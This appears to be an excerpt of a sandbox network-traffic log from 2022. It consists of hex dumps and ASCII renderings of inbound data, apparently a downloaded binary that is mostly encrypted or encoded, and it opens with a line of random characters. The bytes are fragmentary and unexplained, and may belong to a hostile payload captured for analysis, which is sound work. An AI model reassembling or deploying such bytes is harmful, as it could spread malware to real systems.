A182T`Sd4*2x6G<gs7 ie[E9W^7K+Q(pdCV@Rxwgiew(TiKi6-%G%4Mh8L+iCRxrE9&h8y5[~E9W26Y7CT8/q"2C@>^-m2vP'1ehe')LQ<Wj\,p8a&!k2u0
2022-12-05 00:32:43 UTC	42	IN	Data Raw: f8 3e 9c 27 32 df d9 2d 39 67 02 7c f7 f5 81 37 4e e9 8c 7c 16 58 d3 ca 82 73 37 a3 1a 54 4d 58 2b 79 82 a2 95 08 51 e4 00 34 31 46 dd d4 8f 72 42 9d 1b 0a 38 4c 29 64 fb be 9c 27 32 94 b4 4b 78 67 d1 65 a8 29 65 9f 09 28 44 78 3d 5d d0 72 83 73 37 e8 ed 35 0c 58 f8 6c dd 2e 71 a0 60 25 44 30 1a 42 de 10 8e 72 42 d6 16 6d 79 4c fa 5b a4 12 78 8f 29 55 50 4f 53 6f 37 32 f7 29 80 37 4e e9 34 7c 16 58 d3 2e 83 73 37 a3 6a 54 4d 58 16 ca 58 8b 31 48 f2 43 41 71 70 ff 10 d1 2b 32 aa 9b 27 68 38 26 45 d9 c1 b7 38 67 91 5f 54 0e 39 de fc 80 0d 69 8d af 2f 4a 44 2f ed c4 8f 3a 66 90 43 4f 28 36 f4 e8 a4 30 38 86 b2 29 51 47 2e 3b ca fa 81 74 6b 91 1a 71 07 68 81 9c a6 23 41 ba d5 06 32 37 f3 13 3b 26 68 0f 61 d3 b9 92 0e 4a fd 88 b2 18 6a 92 f1 52 37 4b 03 32 f7 Data Ascii: >'2-9g\|7N\|Xs7TMX+yQ41FrB8L)d'2Kxge)e(Dx=]rs75Xl.q`%D0BrBmyL[x)UPOSo72)7N4\|X.s7jTMXX1HCAqp+2'h8&E8g_T9i/JD/:fCO(608)QG.;tkqh#A27;&haJjR7K2
2022-12-05 00:32:43 UTC	43	IN	Data Raw: 33 94 8f 6a 77 4d e1 cd 9e 78 6e 99 62 0c 47 44 63 ca ee 8a 74 6b 91 fa 76 07 68 81 f0 ad 23 41 ba 6d 3a 32 37 07 f5 fd 89 28 65 ee d9 66 36 4e f3 9c 96 17 58 82 7a 3b 33 37 21 65 8c a9 b6 01 70 9b 62 72 09 51 fe bc de 30 46 8c de 37 32 42 1f 51 d2 30 a3 03 63 e2 ce 7c 26 32 8e 4c a0 79 67 80 b1 11 69 65 1d 43 f0 70 97 17 58 c9 a6 62 72 37 f2 21 d9 0d 58 a9 ce 64 6e 71 22 40 fd 1c df 30 46 c7 3c 6f 73 42 cc 2a 87 78 4c ab cb 1d 52 78 0d 3d 8d d0 a0 79 67 cb 95 49 28 65 ce da a5 04 78 bf ca 36 7a 66 65 8d ef 86 76 4d fb 7d 75 79 6e c8 f0 be 07 44 d8 0d 1a 64 34 01 39 f8 b9 a9 28 38 ef fb 61 00 52 c1 87 dd 77 50 a7 5e 3b 68 65 27 67 df 9b a1 0a 44 db 63 5c 2b 7a df 33 c7 0b 69 de 1c 04 41 70 52 7a cb 58 a1 07 44 93 58 42 25 34 d2 16 b2 35 46 80 03 10 43 63 Data Ascii: 3jwMxnbGDctkvh#Am:27(ef6NXz;37!epbrQ0F72BQ0c\|&2LygieCpXbr7!Xdnq"@0F<osB*xLRx=ygI(ex6zfevM}uynDd49(8aRwP^;he'gDc\+z3iApRzXDXB%45FCc
2022-12-05 00:32:43 UTC	45	IN	Data Raw: 07 68 9b 4c 47 22 41 ba eb 3a 32 37 f3 bf 38 26 68 ee 40 19 67 36 4e a2 c7 25 57 58 e1 77 da 30 76 4b ca ce 4c 19 41 98 4b 33 71 48 da 4a d8 32 31 46 c7 1c 69 73 42 9d 25 35 38 4c c8 6e c1 50 39 67 91 b7 53 0e 39 8f 3b 38 4d 69 ee 7a ee 4e 05 78 f4 90 6b 3b 66 db 74 16 69 36 c6 55 8d 74 79 6e d2 1c 53 06 44 d8 43 1b 64 34 e0 3f ae 71 07 68 9b 0c 41 22 41 ba 5b 3a 32 37 db 42 5d 63 29 65 ee b9 64 36 4e a2 57 25 57 58 e1 77 6a 36 76 4b ca 9a 4c 19 41 98 3b 33 71 48 da 4a 78 34 31 46 c7 80 6f 73 42 9d b5 34 38 4c c8 6e c5 56 39 67 91 17 52 0e 39 8f 8b 39 4d 69 ee 7a 86 4e 05 78 f4 c4 69 3b 66 db e4 17 69 36 c6 55 a5 74 79 6e d2 64 53 06 44 d8 b3 1a 64 34 e0 3f c6 76 07 68 9b 94 42 22 41 ba cb 3b 32 37 db 42 69 62 29 65 ee c1 64 36 4e a2 e7 24 57 58 e1 77 16 Data Ascii: hLG"A:278&h@g6N%WXw0vKLAK3qHJ21FisB%58LnP9gS9;8MizNxk;fti6UtynSDCd4?qhA"A[:27B]c)ed6NW%WXwj6vKLA;3qHJx41FosB48LnV9gR99MizNxi;fi6UtyndSDd4?vhB"A;27Bib)ed6N$WXw
2022-12-05 00:32:43 UTC	46	IN	Data Raw: 78 57 d3 67 06 65 72 37 e8 91 34 0c 58 a9 44 60 6e 71 c3 5c 7f 40 71 70 e5 ac 36 2a 32 aa 51 1e 68 38 c7 4e cb 43 13 78 c4 1a 34 11 4f d1 73 30 65 4d e2 68 a7 4c 0b 44 db 53 5b 2b 7a 8e 37 6f 4b 69 bd 40 48 45 31 38 cd 55 4c 10 47 ac c4 27 46 64 bf 66 f6 41 34 46 cb d4 4d 02 63 a9 b6 2f 67 32 bc 5d 47 3a 26 68 c6 59 6b 24 77 a6 9e 13 78 57 d3 67 ee 65 72 37 e8 71 34 0c 58 a9 b4 6f 6e 71 c3 5c 73 47 71 70 e5 a0 35 2a 32 aa c1 11 68 38 c7 4e 83 45 13 78 c4 f2 33 11 4f d1 c3 3f 65 4d 36 3b d4 96 49 05 78 0c 9b 3f f1 8a b0 db 7f 3a 60 1a a7 74 38 3c 2f 71 7b 8a ce 11 e8 21 cf 39 d8 e0 c9 cb 28 9a 97 2d cc 42 22 41 d9 88 e2 c4 42 58 cc f1 98 81 61 4e 69 65 88 7b b6 45 39 57 db ac 76 30 cc 22 cb 68 77 4d dd 81 04 28 e5 89 63 af 96 bb 49 78 2c 9a 6c 82 d2 40 75 Data Ascii: xWger74XD`nq\@qp62Qh8NCx4Os0eMhLDS[+z7oKi@HE18ULG'FdfA4FMc/g2]G:&hYk$wxWger7q4Xonq\sGqp52h8NEx3O?eM6;Ix?:`t8</q{!9(-B"ABXaNie{E9Wv0"hwM(cIx,l@u
2022-12-05 00:32:43 UTC	47	IN	Data Raw: 64 34 ee f2 4d f1 b4 68 38 4c c8 17 65 42 12 67 64 c8 24 6b 1d 98 7d 1d 4c 28 65 f2 8e 45 c0 a1 57 58 6a 49 a6 63 67 21 6d 66 27 59 29 70 38 6e f1 1e ae 52 78 30 31 46 ed 70 4f 2a 71 b5 16 38 68 1c 29 9c be 26 5c 47 62 5f b9 b2 39 67 97 70 91 69 24 77 26 46 47 78 57 32 2a f3 22 17 1b b4 7c 72 4d 19 41 fb 74 4a 55 c1 15 63 54 b5 b9 49 e0 b3 6b 32 42 46 94 3a 6a 1d 13 09 be ad 0c 43 12 65 38 a6 c4 67 68 9a 58 b5 65 36 4e cf 84 0c 10 d3 3f 76 eb 7f 13 27 81 a6 19 58 41 f5 f8 1a 46 c3 1c 5f cf 74 54 56 e7 50 4f 0e 42 fc 02 4c 08 c7 07 47 59 db 3c 43 06 bc 51 c4 c1 a6 8f 61 4e 14 71 37 c7 3e 60 40 da 2c 4e 4a ef 32 92 ee cc 93 c6 24 65 58 d3 4a fa 0c 75 57 14 cf 65 86 64 75 6b b9 06 51 5e 38 c7 59 f7 63 00 52 2e 98 27 db 50 0e 39 31 97 70 8d 69 24 77 b1 3e 60 Data Ascii: d4Mh8LeBgd$k}L(eEWXjIcg!mf'Y)p8nRx01FpOq8h)&\Gb_9gpi$w&FGxW2"\|rMAtJUcTIk2BF:jCe8ghXe6N?v'XAF_tTVPOBLGY<CQaNq7>`@,NJ2$eXJuWedukQ^8YcR.'P91pi$w>`
2022-12-05 00:32:43 UTC	49	IN	Data Raw: 69 24 77 b1 3f a8 87 42 98 6a 3b 66 cc 42 a3 96 23 8d 58 00 70 c7 1b 95 b7 44 87 44 71 70 b9 11 e8 94 27 82 75 07 68 c7 79 c7 61 00 52 2b 98 27 b7 51 0e 39 ec 98 e0 bb 66 e0 a2 b5 b5 bb 91 48 59 6a 7a ed 46 eb b4 1c ca b2 4d 81 70 79 6e 8e 3d a9 b8 51 f0 70 07 64 cb 1e c6 bd 60 86 68 79 4c bc 16 ad ad 6d a7 32 76 50 b0 4c 97 97 70 8d 69 24 77 b1 3f ac 87 42 98 6a 3b 66 cc 42 af 96 23 8d 58 00 70 6e 87 a0 48 51 47 cf 6d 94 b9 11 c8 94 27 82 75 07 68 c7 39 bb 9c 54 92 78 26 32 c8 25 bb c6 72 a8 65 0c 69 9a 02 a2 b5 51 b8 57 19 6a 85 13 c3 c8 5e a9 36 0c 58 be 05 d0 91 64 88 51 06 44 d9 e2 46 64 34 e0 6f aa 8a 33 94 c7 59 83 63 00 52 87 12 ca c8 45 8f 39 26 68 9a 38 9d 9a 62 8e 4a 05 78 a8 2d 9a 85 73 f3 37 0a 69 c9 38 b4 aa b9 b3 33 9d b7 24 bb bb 25 b0 46 Data Ascii: i$w?Bj;fB#XpDDqp'uhyaR+'Q9fHYjzFMpyn=Qpd`hyLm2vPLpi$w?Bj;fB#XpnHQGm'uh9Tx&2%reiQWj^6XdQDFd4o3YcRE9&h8bJx-s7i83$%F
2022-12-05 00:32:43 UTC	50	IN	Data Raw: 90 a0 40 33 0d 62 24 bd 1e fa cf 00 86 e1 39 e9 e6 c6 e4 b9 67 ec 77 c3 00 b0 2c a7 68 24 4d 3e 9a 62 fa 4a 05 78 01 a7 7f 96 66 72 37 1d 96 23 8d 58 00 70 c7 1b 9d b7 44 87 44 71 70 b9 11 dc 94 27 82 75 07 68 c7 39 bb 9c 54 92 78 26 32 c8 25 7f c6 72 a8 65 0c 69 ee 0a 92 c7 c1 14 aa a7 95 2a 31 cc 22 0b 68 77 4d d3 34 a8 bd ae 7e cd 66 bb bb cf fb 1b b4 67 94 27 82 75 07 68 6f b3 56 13 41 13 78 54 f2 68 0e 14 f0 a4 3d ee a1 ea 81 8f cd a6 78 2b 01 0f 02 6a 62 33 37 21 29 bf 19 7c 69 f9 74 4a 5d b7 44 03 44 71 70 2e 6e 36 6b 32 28 35 cd b0 c7 59 07 63 00 52 f3 12 3a bc a8 19 b0 1b 4c 71 b2 7c e1 77 0f 4a c7 80 53 57 e4 cb 64 33 37 2d ea 08 68 57 c4 02 3a 6e 71 c5 17 45 22 b3 48 02 ed 70 4f 2e 4d f0 b6 69 38 4c 25 e0 3f 56 2b 68 b7 d2 51 4f 39 01 eb 1b 4b Data Ascii: @3b$9gw,h$M>bJxfr7#XpDDqp'uh9Tx&2%rei*1"hwM4~fg'uhoVAxTh=x+jb37!)\|itJ]DDqp.n6k2(5YcR:Lq\|wJSWd37-hW:nqE"HpO.Mi8L%?V+hQO9K
2022-12-05 00:32:43 UTC	51	IN	Data Raw: 8b 35 e2 a8 10 33 e2 20 9f 7d 98 cf 35 bb 0a 38 f2 72 32 bc 0e 85 76 1d a7 34 98 6a 06 98 b5 51 47 bb 25 d4 46 25 34 e2 77 b6 f0 86 1c 7e c1 77 63 17 38 38 98 27 73 50 0e 39 98 1d 91 c6 91 ee 32 a2 1d 04 28 a8 2d 82 10 66 5b de b6 69 36 b2 4d e5 70 79 6e 26 b7 62 74 84 56 f9 02 5a ca 94 27 76 74 07 68 6f c5 40 9c 54 92 78 26 32 bc 25 bf 0a 98 2f e8 08 8d 0f 77 1e b5 51 18 52 19 6a 23 3f d8 25 b4 5c 12 49 19 41 43 c7 91 42 b7 44 73 45 71 70 cf 67 62 94 27 3e 70 07 68 61 a7 51 9c 74 76 7c 26 32 04 af b0 0a 98 7d 51 4c 28 65 fe 4d b5 31 80 a8 4d aa 7a 27 33 bc 8c 36 68 16 91 82 26 b3 9f f4 be 5e c3 b3 30 70 46 9b 01 67 31 03 75 10 97 2d 80 43 22 41 ad 4d fb 36 76 50 ec 55 62 29 65 1b 96 70 bb 4e 0b 44 87 62 84 6e 3b 66 90 b3 4e 28 36 1b a7 54 bc 38 2f 71 b7 Data Ascii: 53 }58r2v4jQG%F%4w~wc88'sP92(-f[i6Mpyn&btVZ'vtho@Tx&2%/wQRj#?%\IACBDsEqpgb'>phaQtv\|&2}QL(eM1Mz'36h&^0pFg1u-C"AM6vPUb)epNDbn;fN(6T8/q
2022-12-05 00:32:43 UTC	53	IN	Data Raw: ca 88 c7 7b 35 48 10 47 2c 44 84 06 64 62 e0 ea bd 60 72 69 79 4c fd 17 b5 12 78 ee 77 cf 06 18 c6 72 5c 64 0c 69 33 24 c7 0f b0 87 42 6c 6b 3b 66 ba 72 a7 5a f6 25 58 43 70 38 04 31 c1 14 a7 cf c8 f9 03 8c bd 2e ce cb 30 9a 97 2d 08 43 22 41 3a 78 6f 32 37 3a 0f b0 22 98 9a 58 2d 65 36 4e b5 31 74 dc 05 8e f7 33 db bc bb e4 7b b9 0b c8 05 e0 86 ff 4a 51 47 bb 45 7c cb 31 d4 38 bf 0f 8d ae e5 3c 4c 43 9c 34 5e f5 2a de 64 b8 71 30 67 68 ee 18 bd e8 32 92 1a 12 87 22 88 e1 b1 8e fc 3d 4b 69 b5 89 7c be 45 04 6c 30 48 ae 52 c0 30 31 46 ef c4 e0 77 b6 25 cf 2d cc b3 56 e7 41 13 78 5c f4 4b 6e c4 74 93 e3 b6 a5 9f 59 77 4e c1 51 50 55 19 6a f1 ae db de 77 69 36 c6 25 b1 fd 4d da fa 80 f0 43 47 71 70 cf 21 80 ca c2 43 34 46 e1 75 f4 ca 26 fd f7 f1 2a c6 92 f5 Data Ascii: {5HG,Ddb`riyLxwr\di3$Blk;frZ%XCp81.0-C"A:xo27:"X-e6N1t3{JQGE\|18<LC4^dq0gh2"=Ki\|El0HR01Fw%-VAx\KntYwNQPUjwi6%MCGqp!C4Fu&
2022-12-05 00:32:43 UTC	54	IN	Data Raw: 56 39 67 58 77 d9 0a fd 98 7d 21 4d 28 65 20 24 0a cf 88 a8 4d 2e 7a 27 33 c8 7e e9 35 0c 58 c8 35 dc 91 04 40 07 b8 51 30 70 07 64 bf 93 bf 17 91 cf 15 84 a4 8f 5a 41 52 f3 3a d6 b2 90 40 bd 7f 6c 65 4d 5a 93 21 1d 1d bb 6d 2f 59 2b 7a e3 f3 38 cf 6c 32 4d 58 17 26 52 6d 27 22 50 2f 44 30 70 c6 37 cb 7e 36 92 35 46 3e 68 c5 06 db be 47 3c 66 73 37 db bf 6f 0d 28 9a 58 2d 65 36 4e 20 44 f5 1a ec e3 3f ba 62 ba 05 96 67 1d a7 34 c8 c7 7b f1 48 10 47 c1 f0 7f c2 ed 37 6b 32 71 b5 16 38 68 1c 29 9c be 27 70 37 5a de ad 4f 39 98 7d b9 4d 28 65 fc be c7 0a 38 06 32 2a 85 73 77 37 0a 69 bf 08 b8 c4 86 4c 53 42 81 00 16 12 60 1a b9 9b 41 63 63 2a 9c bb 68 38 b3 56 bf 41 13 78 e2 f2 42 4f b0 4c bb 97 70 8d 69 24 77 19 b5 51 b8 57 19 6a 29 99 26 f7 4b 28 36 b2 2d Data Ascii: V9gXw}!M(e $M.z'3~5X5@Q0pdZAR:@leMZ!m/Y+z8l2MX&Rm'"P/D0p7~65F>hG<fs7o(X-e6N D?bg4{HG7k2q8h)'p7ZO9}M(e82sw7iLSB`Acch8VAxBOLpi$wQWj)&K(6-
2022-12-05 00:32:43 UTC	58	IN	Data Raw: b2 dd b7 04 3f 38 8e 5d 69 46 05 30 fb 33 94 62 94 27 ae 75 07 68 6e b3 56 a3 41 13 78 ec 77 df d5 8f 4d 60 38 9a 58 51 64 36 4e c1 31 94 01 a7 7f 96 66 72 37 1d 96 23 8d 58 00 70 6f 91 64 88 51 06 44 cf 05 ba 9b 21 ab 32 03 75 15 97 2d 8c 43 22 41 38 78 98 27 13 50 0e 39 38 36 3e 84 aa 30 fc a2 c9 a8 64 d4 3d 96 7a 35 65 60 23 39 f5 4d 58 2b 30 b3 9f 8e 5d 15 47 05 30 18 4e 66 34 6b 58 02 fe be 97 2d 08 43 22 41 34 fb 59 5a bc 88 c6 64 97 67 e0 43 6b 65 77 24 3e 1c 1e 6e 1e 68 75 e3 32 35 4b 69 50 74 1e 45 7f bd 99 70 48 51 21 c7 4e 76 36 6b b1 87 33 42 75 b9 5d 90 48 02 63 4e e5 3e 6f 64 be 15 bb c6 72 e8 64 0c 69 a2 32 b6 65 44 78 57 6b b8 f7 16 35 38 fc 6f bd 85 3e 7a 35 c0 1a 65 7b 91 05 22 b9 7c 5e e9 30 79 3d f5 79 76 0e 03 01 bb 16 af 01 87 72 b6 Data Ascii: ?8]iF03b'uhnVAxwM`8XQd6N1fr7#XpodQD!2u-C"A8x'P986>0d=z5e`#9MX+0]G0Nf4kX-C"A4YZdgCkew$>nhu25KiPtEpHQ!Nv6k3Bu]HcN>odrdi2eDxWk58o>z5e{"\|^0y=yvr
2022-12-05 00:32:43 UTC	62	IN	Data Raw: 66 3d b2 b4 4e 39 67 02 45 7e 96 0f 37 c7 36 60 5c a8 4d 2e 7a 27 33 60 1c 03 32 1a 32 40 18 38 6e 71 c8 07 ce 00 14 5c b9 71 08 6b 73 42 1d 4a 6b 38 4c 29 23 c8 16 5c 73 cd 22 14 4f 78 67 00 7d 4b 69 65 1d 0e c1 bc 87 42 1c 6a 3b 66 cc 02 e7 68 77 4d 08 be 65 0c 6f 30 48 da 12 4c bb b8 ae 9b 22 6b 32 71 bc cf 2c 1c 54 12 32 10 03 12 98 62 66 38 a6 c4 67 68 9a 58 b5 65 36 4e cf 84 0c 10 6b a3 2b 37 63 60 21 96 c9 39 7c 6d 21 50 87 8c 48 51 b8 51 ec 70 07 64 b1 ab 46 69 f6 22 4c 5c 4c c8 27 65 5e f1 1b 16 6f db 33 1d 77 e1 11 69 09 e8 03 6a 12 cd 3c 73 04 ad 3e 42 2f 36 4b 69 36 e8 fd e4 d5 d3 4e 26 b7 44 87 44 71 70 cd 20 10 67 62 bd 60 f2 68 79 4c 15 9c 54 be 78 26 32 61 af 5a f9 67 29 65 b2 1d 41 6f b1 5f 84 78 16 58 d5 72 64 33 37 1c 03 76 b2 4d 05 70 Data Ascii: f=N9gE~76`\M.z'3`22@8nq\qksBJk8L)#\s"Oxg}KieBj;fhwMeo0HL"k2q,T2bf8ghXe6Nk+7c`!9\|m!PHQQpdFi"L\L'e^o3wij<s>B/6Ki6N&DDqp gb`hyLTx&2aZg)eAo_xXrd37vMp
2022-12-05 00:32:43 UTC	63	IN	Data Raw: 54 b0 38 2f 71 7b 91 07 1b 6e 2b 8f a6 30 6b 67 c9 99 c7 84 94 4c 43 63 17 05 f5 e2 66 c8 af b0 69 98 7d 45 4d 28 65 1f 4e 4e 44 78 3d 18 95 6f 22 33 76 4b e2 a3 19 a7 be 8f 0b a7 86 92 da bf 16 5a 5b 1e e1 e6 64 7d 8a 24 b9 5d 50 4f 02 63 16 ad 6d 83 32 76 50 c4 4c 6f eb a1 5d e2 b2 fc 40 a2 b5 6a 57 58 3d f3 60 cc 22 8b 69 77 4d 6b 81 2f 78 30 b8 8a 55 47 11 bb 9c 10 33 5c 6b 36 42 75 2c 28 c7 59 07 63 00 52 12 66 b9 cf af 5a 71 67 29 65 1d 03 65 88 5b 02 44 39 57 08 95 4f 7a 30 76 4b 3e c9 58 bc 41 31 38 e5 04 40 d2 83 54 bb a7 cd 6a dc f6 20 42 75 11 e1 3e b3 56 a3 41 13 78 54 f2 68 10 11 64 a5 6c 65 18 e2 89 21 19 20 44 4b a1 32 6a 3c 99 26 33 4a 28 36 c8 98 34 7e c7 7b dd 48 10 47 77 f9 f3 be 1c 3b 2f c3 2a 75 42 68 38 26 03 9c 54 16 78 26 32 bc a8 Data Ascii: T8/q{n+0kgLCcfi}EM(eNNDx=o"3vKZ[d}$]POcm2vPLo]@jWX=`"iwMk/x0UG3\k6Bu,(YcRfZqg)ee[D9WOz0vK>XA18@Tj Bu>VAxThdle! DK2j<&3J(64~{HGw;/*uBh8&Tx&2
2022-12-05 00:32:43 UTC	68	IN	Data Raw: cf af 5a ad 66 29 65 1a 96 70 c3 4e 0b 44 f5 da 94 97 85 99 62 61 b4 7c 42 4d 19 41 f5 f8 61 f4 11 ae b8 bb 70 9b 44 57 f4 34 6c 19 bc 85 3e 6f 24 49 61 41 52 12 27 b9 ce af 5a 7d 67 29 65 c6 99 56 b7 18 1a 14 12 4b 08 95 6f ee 32 76 4b ec f6 35 7e ca 65 44 6a 30 48 da 89 ac 42 72 46 64 bf 9b 64 bd 42 b9 7d 0c 4d 02 63 17 db 7f 98 27 f7 50 0e 39 54 a8 25 a6 64 e0 81 3a 4d 12 87 42 98 6a 3b 66 00 f7 14 37 f5 18 d3 ad f3 d4 7e d0 e4 50 06 44 63 26 11 ef ee e2 7f b2 24 cf 35 cc c5 06 9b be 47 fc 67 73 37 dd 4b 7c 67 69 65 4d 39 0f 37 b1 5f 00 78 16 58 e1 82 55 c5 bc 0e 99 5c 4f 01 27 f3 00 32 7e 0c a0 44 b4 3f f4 88 64 34 6b 62 bd 60 c2 68 79 4c ce 67 04 52 79 67 32 67 3a 0f c6 72 2c 65 0c 69 9a 42 c2 48 05 78 de 1d 96 2c 99 26 b7 4a 28 36 c6 80 c4 ab 4c 56 Data Ascii: Zf)epNDba\|BMAapDW4l>o$IaAR'Z}g)eVKo2vK5~eDj0HBrFddB}Mc'P9T%d:MBj;f7~PDc&$5Ggs7K\|gieM97_xXU\O'2~D?d4kb`hyLgRyg2g:r,eiBHx,&J(6LV
2022-12-05 00:32:43 UTC	72	IN	Data Raw: 71 9c 8e b7 da 91 cf f8 98 06 96 cb 94 5a 5a 73 46 68 52 0c c8 93 be 47 3c 67 73 37 3a 4f c6 13 4c 79 c4 2d 41 6f b1 5f c0 78 16 58 e7 2e 42 27 ba 47 2e de 81 b7 be 8f b3 3a 55 5c 08 cc 8a d8 79 b4 9b cb e0 c2 71 b5 16 38 68 1c 29 9c 17 02 10 8e cf 37 50 c6 4d 43 38 9a 58 b5 65 36 4e 22 00 79 57 58 00 3a ef 77 13 7b 96 23 09 58 00 70 b3 22 55 60 d8 03 60 10 f5 8f 6b b0 c7 32 42 75 75 ba 6a 1e 12 33 2b ad 2e 35 5a de ad 4f 39 98 7d b9 4d 28 65 f2 8e 3f 01 2e a8 4d aa 7a 27 33 bc 07 4d 16 1c a7 54 b0 38 2f 71 b7 25 63 54 cf 65 86 64 75 6b 61 bd 60 86 68 79 4c 14 9c 54 92 78 26 32 bc 1c 6b 1d 36 97 70 f9 69 24 77 1d b5 51 94 57 19 6a f1 12 17 23 a2 ed 36 4d 58 29 7a 3a 6e 71 22 11 b8 51 74 70 07 64 bf 27 16 62 26 cf 24 1c 70 c8 2f 65 7a 28 ee 7e 13 14 b0 2c Data Ascii: qZZsFhRG<gs7:OLy-Ao_xX.B'G.:U\yq8h)7PMC8Xe6N"yWX:w{#Xp"U``k2Buuj3+.5ZO9}M(e?.Mz'3MT8/q%cTeduka`hyLTx&2k6pi$wQWj#6MX)z:nq"Qtpd'b&$p/ez(~,
2022-12-05 00:32:43 UTC	76	IN	Data Raw: 2e 0e 06 0a 56 75 5a 57 12 28 28 73 1d 32 61 53 7a 66 33 37 78 3b 30 6c 07 16 30 6f 40 72 53 51 24 21 07 48 22 00 0d 09 0b 70 11 72 5c 08 79 27 63 41 52 78 40 22 70 04 42 3e 3f 7e 39 2b 62 3a 26 10 3a 58 78 57 58 6a 4a 56 57 00 7b 5c 02 79 68 77 45 5b 5c 46 2d 66 47 44 30 70 31 31 24 09 71 12 33 3c 39 63 1c 77 63 41 52 78 56 50 52 34 2a 0a 50 59 5d 7c 0d 5d 12 76 73 20 78 57 58 6a 19 61 31 1c 5e 3f 6f 37 05 09 51 78 5c 71 48 51 75 27 54 49 73 06 52 5a 05 76 13 23 0a 59 28 73 63 41 52 78 07 34 34 38 0f 3e 73 20 04 18 63 75 70 6a 56 23 78 57 58 6a 4a 07 0b 53 29 0f 03 7f 6a 75 43 0e 08 49 29 30 47 44 30 70 31 60 78 5b 3f 4f 25 1a 13 62 19 1a 77 14 52 6d 3e 3c 61 50 7f 5b 04 59 04 75 5a 03 16 76 29 21 1e 32 69 59 7a 66 33 37 38 79 30 1d 4d 1c 13 2c 60 2a 4e Data Ascii: .VuZW((s2aSzf37x;0l0o@rSQ$!H"pr\y'cARx@"pB>?~9+b:&:XxWXjJVW{\yhwE[\F-fGD0p11$q3<9cwcARxVPR4PY]\|]vs xWXja1^?o7Qx\qHQu'TIsRZv#Y(scARx448>s cupjV#xWXjJS)juCI)0GD0p1`x[?O%bwRm><aP[YuZv)!2iYzf378y0M,`N
2022-12-05 00:32:43 UTC	80	IN	Data Raw: 10 79 34 76 71 55 42 73 50 07 5e 03 26 40 24 68 38 4c 43 56 45 17 4e 22 75 37 16 19 65 16 31 20 64 33 63 74 4e 4a 44 4f 6f 3b 5b 4b 04 04 56 7b 5d 52 7d 69 71 49 0f 6e 71 48 51 23 08 21 24 03 65 6b 48 6e 02 75 46 0e 0e 75 76 57 25 30 1d 04 56 54 61 76 0e 01 5d 65 4d 69 65 42 3d 3f 34 0f 67 1a 61 78 6f 35 59 1d 30 0f 1b 5f 05 2d 21 7a 76 4b 46 40 7f 3d 34 12 31 37 2c 0b 11 22 10 2e 25 5e 52 65 41 1d 69 3b 7d 21 0c 5b 6e 2a 34 3e 47 54 6d 7b 44 5d 1d 6d 40 5b 27 6c 39 78 63 0b 64 3b 46 64 5c 76 68 25 66 68 36 6e 3f 29 26 00 65 32 67 25 79 75 16 23 6b 59 43 05 73 61 19 04 00 05 31 79 5a 53 5e 56 7e 5f 57 77 4e 4a 44 5d 0a 04 60 70 31 72 37 7f 5a 0e 2c 3c 20 13 5a 5b 49 2b 37 25 75 51 46 46 64 34 6b 48 14 39 50 63 2b 44 7d 15 16 5e 75 6c 66 25 50 2a 5a 54 0e Data Ascii: y4vqUBsP^&@$h8LCVEN"u7e1 d3ctNJDOo;[KV{]R}iqInqHQ#!$ekHnuFuvW%0VTav]eMieB=?4gaxo5Y0_-!zvKF@=417,".%^ReAi;}![n4>GTm{D]m@['l9xcd;Fd\vh%fh6n?)&e2g%yu#kYCsa1yZS^V~_WwNJD]`p1r7Z,< Z[I+7%uQFFd4kH9Pc+D}^ulf%PZT
2022-12-05 00:32:43 UTC	84	IN	Data Raw: a3 5d 64 d4 ba 5d 73 e6 04 5d 87 89 73 5c 45 18 19 5d 88 f1 bf 5e 22 ec 41 5e 0e 48 ae 5e 9c 7c d6 5c cd 12 30 5d 9a 2c 23 5e 05 ee ba 5e 9b 0c 77 5c 7f 2a 51 5d df c9 42 5d 26 42 e2 5e ef 78 fd de 9d 25 0f 5d ed a0 ae 5e 36 7a f7 5e ad 26 44 5d 1c 6e b2 5e 42 b0 c7 5e e4 14 1a 5d 3b c6 cf 5c 51 93 99 5c 85 b7 24 5d 71 db 9f 5e 4a a9 f9 de df a3 42 5d 20 6e 5b 5d d4 c0 17 5e 04 2f 50 5d 73 27 30 5d bf 01 95 5e 79 f5 cb 5e f9 51 0f 5d e4 20 92 5e 24 f6 09 5d e8 91 8c 5d 14 a7 09 5d 81 0b e6 5e 8b cf 4b 5d a8 b3 ae 5e 70 2a 14 5c 30 a9 50 5d 8a 8f bf 5c 7c d6 95 5e b8 7c 2a 5c aa 26 bf 5e fd 42 c2 5c 61 d5 0f 5d 25 a9 8e 5c d1 6b 14 5e ed 19 ec 5c 9c f8 74 5c 9c a0 29 5d c5 83 f6 de df 74 ec 5c 4a af 46 5d 57 1c 24 5c 58 73 1c 5e c2 07 be 5e 97 7e 13 5d 07 Data Ascii: ]d]s]s\E]^"A^H^\|\0],#^^w\Q]B]&B^x%]^6z^&D]n^B^];\Q\$]q^JB] n[]^/P]s'0]^y^Q] ^$]]]^K]^p\0P]\\|^\|*\&^B\a]%\k^\t\)]t\JF]W$\Xs^^~]
2022-12-05 00:32:43 UTC	88	IN	Data Raw: 00 00 00 00 00 20 00 00 00 30 00 00 00 dc 8f fe ff fe 00 00 00 00 43 0e 20 02 8a 0a 0e 04 43 0b 02 51 0a 0e 04 41 0b 00 00 14 00 00 00 54 00 00 00 b8 90 fe ff 3e 00 00 00 00 43 0e 30 7a 0e 04 00 58 00 00 00 6c 00 00 00 e0 90 fe ff 23 03 00 00 00 44 0c 01 00 49 10 05 02 75 00 48 10 07 02 75 7c 10 06 02 75 78 10 03 02 75 74 43 0f 03 75 70 06 03 3f 02 0a c1 0c 01 00 41 c3 41 c6 41 c7 41 c5 43 0c 04 04 42 0b 02 7f 0a c1 0c 01 00 41 c3 41 c6 41 c7 41 c5 43 0c 04 04 4a 0b 10 00 00 00 c8 00 00 00 b4 93 fe ff 0f 00 00 00 00 00 00 00 10 00 00 00 dc 00 00 00 b0 93 fe ff 0f 00 00 00 00 00 00 00 14 00 00 00 f0 00 00 00 ac 93 fe ff 1d 00 00 00 00 43 0e 20 54 0e 04 00 14 00 00 00 00 00 00 00 01 7a 52 00 01 7c 08 01 1b 0c 04 04 88 01 00 00 2c 00 00 00 1c 00 00 00 9c 93 Data Ascii: 0C CQAT>C0zXl#DIuHu\|uxutCup?AAAACBAAAACJC TzR\|,
